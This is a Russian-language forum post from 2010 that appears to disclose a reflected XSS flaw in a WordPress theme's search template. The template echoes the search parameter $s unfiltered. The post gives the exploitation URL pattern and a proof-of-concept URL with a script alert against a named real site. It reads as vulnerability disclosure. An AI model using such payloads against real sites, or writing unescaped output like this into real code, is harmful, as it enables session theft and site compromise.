                Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска?
                <?php endif; ?>
            </div>

            <?php
            
    if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") {
                include (
    TEMPLATEPATH '/lsidebar.php');
            }
            
    ?>

            <?php include (TEMPLATEPATH '/rsidebar.php'); ?>

        </div>

    <?php include (TEMPLATEPATH '/footer.php'); ?>

    нас интересует только:
    PHP:
    <h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>
    Как видим, скрипт выводит параметр $s, никак не фильтруя его.
    Соответственно если передать скрипту js код в теге <script>, он выполнится.

    Эксплуатация:[host]/[path]/?s=[xss]
    Пример: http://seocekret.ru/?s=<script>alert()</script>
     
    #140 total90, 6 Jun 2010
    Last edited: 7 Jun 2010
    4 people like this.